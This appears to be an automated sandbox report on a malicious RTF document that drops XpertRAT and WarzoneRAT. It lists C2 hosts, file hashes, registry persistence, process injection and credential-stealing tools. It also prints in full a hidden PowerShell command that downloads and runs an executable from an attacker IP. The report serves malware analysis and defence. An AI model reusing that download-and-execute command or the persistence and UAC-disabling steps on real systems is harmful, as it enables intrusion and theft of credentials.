Analysis
- max time kernel: 152s
- max time network: 148s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 05-12-2020 11:47

Static task: static1

Behavioral task: behavioral1
  Sample: SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf
  Resource: win7v20201028

Behavioral task: behavioral2
  Sample: SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf
  Resource: win10v20201028
General
- Target: SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf
- Size: 813KB
- MD5: 03d11e6b979a69b7ebda725436ab236e
- SHA1: 98ff07105b6e3972f79d9ad872730a2a7da1063d
- SHA256: 1d0f4b56524f0e8aa3813ae9f2cdbf5a272167e28f11c3822c95d415347e5ba1
- SHA512: 99a88a180fc52a3f21d68f12d933ec32fedcbe45243a886c9448150a690d4b660ff8385c0c94290c392f37a6defc0cb54da7fe82a61eb8e0f522602591d02e70
Malware Config

Extracted
  URL: httP://192.3.194.245/xpertorigin.exe

Extracted
  Family: warzonerat
  C2: 195.140.214.82:6703

Extracted
  Family: xpertrat
  Version: 3.0.10
  Botnet: special X
  C2: zytriew.duckdns.org:4145
  C2: papertyy.duckdns.org:4145
  C2: ghytrty.duckdns.org:4145
  Mutex: A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1
Signatures

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process
  pid: 1492 (powershell.exe)  pid_target: 1844 (WINWORD.EXE)

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

XpertRAT Core Payload (3 IoCs)
Processes:
  resource                                                                      yara_rule
  behavioral1/memory/1240-49-0x0000000000400000-0x0000000000443000-memory.dmp  xpertrat
  behavioral1/memory/1240-50-0x0000000000401364-mapping.dmp                    xpertrat
  behavioral1/memory/1240-51-0x0000000000400000-0x0000000000443000-memory.dmp  xpertrat

NirSoft MailPassView (3 IoCs)
Password recovery tool for various email clients
Processes:
  resource                                                                      yara_rule
  behavioral1/memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmp  MailPassView
  behavioral1/memory/1228-62-0x0000000000411654-mapping.dmp                    MailPassView
  behavioral1/memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmp  MailPassView

NirSoft WebBrowserPassView (3 IoCs)
Password recovery tool for various web browsers
Processes:
  resource                                                                     yara_rule
  behavioral1/memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmp  WebBrowserPassView
  behavioral1/memory/708-67-0x0000000000442F04-mapping.dmp                    WebBrowserPassView
  behavioral1/memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmp  WebBrowserPassView

Nirsoft (11 IoCs)
Processes:
  resource                                                                      yara_rule
  behavioral1/memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmp   Nirsoft
  behavioral1/memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmp  Nirsoft
  behavioral1/memory/1228-62-0x0000000000411654-mapping.dmp                    Nirsoft
  behavioral1/memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmp  Nirsoft
  behavioral1/memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmp   Nirsoft
  behavioral1/memory/708-67-0x0000000000442F04-mapping.dmp                     Nirsoft
  behavioral1/memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmp   Nirsoft
  behavioral1/memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmp   Nirsoft
  behavioral1/memory/1332-75-0x0000000000400000-0x0000000000415000-memory.dmp  Nirsoft
  behavioral1/memory/1332-76-0x000000000040C2A8-mapping.dmp                    Nirsoft
  behavioral1/memory/1332-77-0x0000000000400000-0x0000000000415000-memory.dmp  Nirsoft

Warzone RAT Payload (1 IoCs)
Processes:
  resource                                                                      yara_rule
  behavioral1/memory/1112-32-0x0000000000750000-0x00000000008A4000-memory.dmp  warzonerat
Adds policy Run key to start application (2 TTPs, 2 IoCs)
Processes:
  description      ioc                                                                                                                                                                                                                                          process
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run                                                                                                                                                          iexplore.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe"  iexplore.exe

Blocklisted process makes network request (1 IoCs)
Processes:
  flow  pid   process
  6     1492  powershell.exe

Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
Processes:
  pid   process
  1112  xpertorigin.exe
  2028  .oBHHDgvA.exe

Sets DLL path for service in the registry (2 TTPs)

Yara matches, rule upx (the signature heading is missing from the page):
  resource                                                                     yara_rule
  behavioral1/memory/584-56-0x0000000000400000-0x0000000000426000-memory.dmp  upx
  behavioral1/memory/584-58-0x0000000000400000-0x0000000000426000-memory.dmp  upx
  behavioral1/memory/584-59-0x0000000000400000-0x0000000000426000-memory.dmp  upx
  behavioral1/memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmp  upx
  behavioral1/memory/912-70-0x0000000000400000-0x0000000000416000-memory.dmp  upx
  behavioral1/memory/912-72-0x0000000000400000-0x0000000000416000-memory.dmp  upx
  behavioral1/memory/912-73-0x0000000000400000-0x0000000000416000-memory.dmp  upx
  behavioral1/memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmp  upx

Loads dropped DLL (12 IoCs)
Processes:
  pid   process
  1492  powershell.exe
  1112  xpertorigin.exe
  2028  .oBHHDgvA.exe
  2028  .oBHHDgvA.exe
  2028  .oBHHDgvA.exe
  112   (no process name recorded)
  1112  xpertorigin.exe
  1112  xpertorigin.exe
  1112  xpertorigin.exe
  1112  xpertorigin.exe
  1112  xpertorigin.exe
  1112  xpertorigin.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Registry modification (the signature heading is missing from the page):
  description      ioc                                                                                process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0"  .oBHHDgvA.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
Processes:
  description      ioc                                                                                                                                                                                                                                                              process
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run                                                                                                                                                        iexplore.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe"  iexplore.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run                                                                                                                                                                                      iexplore.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe"                              iexplore.exe

Registry modification (the signature heading is missing from the page):
  description      ioc                                                                                      process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  .oBHHDgvA.exe

Modifies WinLogon (2 TTPs, 4 IoCs)
Processes:
  description      ioc                                                                                                      process
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList             xpertorigin.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts                      xpertorigin.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\d.oirKh = "0"  xpertorigin.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"        xpertorigin.exe

Drops file in System32 directory (1 IoCs)
Processes:
  description   ioc                               process
  File created  C:\Windows\System32\rfxvmt.dll   xpertorigin.exe

Suspicious use of SetThreadContext (9 IoCs)
Processes:
  description                            pid   process        target process
  PID 2028 set thread context of 1644    2028  .oBHHDgvA.exe  iexplore.exe
  PID 2028 set thread context of 2024    2028  .oBHHDgvA.exe  iexplore.exe
  PID 2028 set thread context of 1240    2028  .oBHHDgvA.exe  iexplore.exe
  PID 1240 set thread context of 584     1240  iexplore.exe   iexplore.exe
  PID 1240 set thread context of 1228    1240  iexplore.exe   iexplore.exe
  PID 1240 set thread context of 1328    1240  iexplore.exe   iexplore.exe
  PID 1240 set thread context of 708     1240  iexplore.exe   iexplore.exe
  PID 1240 set thread context of 912     1240  iexplore.exe   iexplore.exe
  PID 1240 set thread context of 1332    1240  iexplore.exe   iexplore.exe

Drops file in Program Files directory (2 IoCs)
Processes:
  description   ioc                                           process
  File created  C:\Program Files\Microsoft DN1\sqlmap.dll    xpertorigin.exe
  File created  C:\Program Files\Microsoft DN1\rdpwrap.ini   xpertorigin.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Office loads VBA resources, possible macro or embedded object present

Registry modification by WINWORD.EXE (the signature heading is missing from the page; the process tree below lists it as "Modifies Internet Explorer settings"):
  description      ioc                                                                                                                                                                          process
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar                                                                      WINWORD.EXE
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote                                                    WINWORD.EXE
  Set value (int)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"                                    WINWORD.EXE
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel                                          WINWORD.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"  WINWORD.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"                                        WINWORD.EXE
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt                                                                      WINWORD.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"  WINWORD.EXE
  Set value (int)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"                            WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes:
  pid   process
  1844  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (11 IoCs)
Processes:
  pid   process         count
  1492  powershell.exe  2
  2028  .oBHHDgvA.exe   8
  708   iexplore.exe    1

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
  pid   process
  1844  WINWORD.EXE

Suspicious behavior: LoadsDriver (4 IoCs)
Processes:
  pid   process
  112   (no process name recorded, 4 entries)

Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1492  powershell.exe
  Token: SeDebugPrivilege  1112  xpertorigin.exe
  Token: SeDebugPrivilege  1240  iexplore.exe
  Token: SeDebugPrivilege  584   iexplore.exe

Suspicious use of SetWindowsHookEx (5 IoCs)
Processes:
  pid   process        count
  1844  WINWORD.EXE    3
  2028  .oBHHDgvA.exe  1
  1240  iexplore.exe   1

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (identical rows grouped, with the number of occurrences in the last column):
  description                        pid   process          target process   count
  PID 1844 wrote to memory of 1492   1844  WINWORD.EXE      powershell.exe   4
  PID 1844 wrote to memory of 1652   1844  WINWORD.EXE      splwow64.exe     4
  PID 1492 wrote to memory of 1112   1492  powershell.exe   xpertorigin.exe  4
  PID 1112 wrote to memory of 2028   1112  xpertorigin.exe  .oBHHDgvA.exe    7
  PID 2028 wrote to memory of 1644   2028  .oBHHDgvA.exe    iexplore.exe     12
  PID 2028 wrote to memory of 2024   2028  .oBHHDgvA.exe    iexplore.exe     12
  PID 2028 wrote to memory of 1240   2028  .oBHHDgvA.exe    iexplore.exe     12
  PID 1240 wrote to memory of 584    1240  iexplore.exe     iexplore.exe     9

System policy modification (1 TTPs, 1 IoCs)
Processes:
  description      ioc                                                                                      process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  .oBHHDgvA.exe
Processes
(indented by depth in the process tree; the level number is the one shown on the page)

Level 1: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf"
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.245/xpertorigin.exe','C:\Users\Admin\AppData\Roaming\xpertorigin.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\xpertorigin.exe'"
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Users\Admin\AppData\Roaming\xpertorigin.exe
      command line: "C:\Users\Admin\AppData\Roaming\xpertorigin.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Modifies WinLogon
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      Level 4: C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
        command line: "C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Windows security modification
        - Checks whether UAC is enabled
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        - System policy modification

        Level 5: C:\Program Files (x86)\Internet Explorer\iexplore.exe
          command line: C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe

        Level 5: C:\Program Files (x86)\Internet Explorer\iexplore.exe
          command line: C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe

        Level 5: C:\Program Files (x86)\Internet Explorer\iexplore.exe
          command line: C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
          - Adds policy Run key to start application
          - Adds Run key to start application
          - Suspicious use of SetThreadContext
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory

          Level 6: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            command line: /stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri0.txt"
            - Suspicious use of AdjustPrivilegeToken

          Level 6: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            command line: /stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri1.txt"

          Level 6: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            command line: /stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txt"

          Level 6: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            command line: /stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txt"
            - Suspicious behavior: EnumeratesProcesses

          Level 6: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            command line: /stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri3.txt"

          Level 6: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            command line: /stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri4.txt"

  Level 2: C:\Windows\splwow64.exe
    command line: C:\Windows\splwow64.exe 12288
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
  MD5: 2e6f05e8245b62297355f070a6f966df
  SHA1: 7461222b5d34eb2328c7d50a75956f9dc78c32a3
  SHA256: f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178
  SHA512: 44302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899

C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txt
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri4.txt
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Roaming\xpertorigin.exe
  MD5: 85063571eccad2a81103ea6603ba1e08
  SHA1: c762c1e085a489b21c125e75e21683cd86e138c9
  SHA256: f5068e95e11b906cf33949376159ed87e03eb29e774029e84b8151c76d69ccf4
  SHA512: 8a271d14190d2bf5cb9d4a62830b750b64954a9ed5d5ac803dca2ce9e9b38b6a69fd61518e0271dfbddeb20de383d686f6b0d9cfdf26be7ed394b244e41ca12f

\Program Files\Microsoft DN1\sqlmap.dll
  MD5: 461ade40b800ae80a40985594e1ac236
  SHA1: b3892eef846c044a2b0785d54a432b3e93a968c8
  SHA256: 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
  SHA512: 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
  MD5: 2e6f05e8245b62297355f070a6f966df
  SHA1: 7461222b5d34eb2328c7d50a75956f9dc78c32a3
  SHA256: f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178
  SHA512: 44302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899

\Users\Admin\AppData\Roaming\xpertorigin.exe
  MD5: 85063571eccad2a81103ea6603ba1e08
  SHA1: c762c1e085a489b21c125e75e21683cd86e138c9
  SHA256: f5068e95e11b906cf33949376159ed87e03eb29e774029e84b8151c76d69ccf4
  SHA512: 8a271d14190d2bf5cb9d4a62830b750b64954a9ed5d5ac803dca2ce9e9b38b6a69fd61518e0271dfbddeb20de383d686f6b0d9cfdf26be7ed394b244e41ca12f

Memory dumps (resource, Filesize where the page gives one):
  memory/112-45-0x000007FEF7120000-0x000007FEF739A000-memory.dmp   2.5MB
  memory/584-57-0x0000000000423BC0-mapping.dmp
  memory/584-56-0x0000000000400000-0x0000000000426000-memory.dmp   152KB
  memory/584-59-0x0000000000400000-0x0000000000426000-memory.dmp   152KB
  memory/584-58-0x0000000000400000-0x0000000000426000-memory.dmp   152KB
  memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmp   152KB
  memory/708-67-0x0000000000442F04-mapping.dmp
  memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmp   356KB
  memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmp   356KB
  memory/912-71-0x0000000000413750-mapping.dmp
  memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmp   88KB
  memory/912-72-0x0000000000400000-0x0000000000416000-memory.dmp   88KB
  memory/912-73-0x0000000000400000-0x0000000000416000-memory.dmp   88KB
  memory/912-70-0x0000000000400000-0x0000000000416000-memory.dmp   88KB
  memory/1112-32-0x0000000000750000-0x00000000008A4000-memory.dmp  1.3MB
  memory/1112-30-0x0000000000000000-mapping.dmp
  memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmp  108KB
  memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmp  108KB
  memory/1228-62-0x0000000000411654-mapping.dmp
  memory/1240-50-0x0000000000401364-mapping.dmp
  memory/1240-51-0x0000000000400000-0x0000000000443000-memory.dmp  268KB
  memory/1240-49-0x0000000000400000-0x0000000000443000-memory.dmp  268KB
  memory/1328-65-0x0000000000442F04-mapping.dmp
  memory/1332-77-0x0000000000400000-0x0000000000415000-memory.dmp  84KB
  memory/1332-76-0x000000000040C2A8-mapping.dmp
  memory/1332-75-0x0000000000400000-0x0000000000415000-memory.dmp  84KB
  memory/1356-2-0x000007FEF7120000-0x000007FEF739A000-memory.dmp   2.5MB
  memory/1492-8-0x0000000004870000-0x0000000004871000-memory.dmp   4KB
  memory/1492-7-0x0000000004960000-0x0000000004961000-memory.dmp   4KB
  memory/1492-26-0x00000000062C0000-0x00000000062C1000-memory.dmp  4KB
  memory/1492-3-0x0000000000000000-mapping.dmp
  memory/1492-18-0x0000000005800000-0x0000000005801000-memory.dmp  4KB
  memory/1492-17-0x00000000056C0000-0x00000000056C1000-memory.dmp  4KB
  memory/1492-12-0x0000000005650000-0x0000000005651000-memory.dmp  4KB
  memory/1492-9-0x0000000005290000-0x0000000005291000-memory.dmp   4KB
  memory/1492-5-0x000000006A290000-0x000000006A97E000-memory.dmp   6.9MB
  memory/1492-25-0x0000000006280000-0x0000000006281000-memory.dmp  4KB
  memory/1492-6-0x0000000000A00000-0x0000000000A01000-memory.dmp   4KB
  memory/1644-44-0x0000000000401364-mapping.dmp
  memory/1652-4-0x0000000000000000-mapping.dmp
  memory/2024-47-0x0000000000401364-mapping.dmp
  memory/2028-55-0x0000000002790000-0x0000000002794000-memory.dmp  16KB
  memory/2028-54-0x00000000024A0000-0x00000000024A4000-memory.dmp  16KB
  memory/2028-35-0x0000000000000000-mapping.dmp